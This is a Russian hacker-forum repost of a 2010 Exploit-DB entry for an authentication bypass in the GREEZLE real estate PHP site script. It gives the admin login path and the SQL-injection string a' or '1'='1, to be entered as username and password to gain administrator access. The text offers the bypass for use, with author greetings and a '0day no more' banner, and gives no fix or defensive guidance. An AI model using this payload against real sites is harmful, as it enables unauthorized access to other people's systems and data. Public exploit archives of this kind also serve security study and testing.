Exploit GREEZLE - Global Real Estate Agent Site Auth SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13783
Проверка EDB
  1. Пройдено
Автор
L0RD CRUSAD3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-06-09
Код:
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title: GREEZLE - Global Real Estate Agent Site Authentication ByPass
Published: 2010-06-09
Vendor url:http://www.ifstudio.org/greezla/
Price:99$
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer and to all ICW
members
#############################################################################################################################################################################


GREEZLE - Global Real Estate Agent Site Authentication ByPass

Author: L0rd CrusAd3r aka VSN [[email protected]]

#############################################################################################################################################################################

Description:

GREEZLE is an easy in use site which allows to sell online any real estate
objects.
Visitors are able to browse, search and view properties.
 It allows you to create agent accounts, who can also sell any real estate
objects at a fee you charge.

###############################################################################################################################################################################

Vulnerability:

*Authentication Bypass found

The Provided Script as Sqli Vulnerability in Admin Login page

Example : http://[site]/en/login

Use the string a' or '1'='1 for User name and Password to gain access

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 # 0day no more#
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


################################################################################################################################################################################
-- 
With R3gards,
L0rd CrusAd3r
 
Источник
www.exploit-db.com

Похожие темы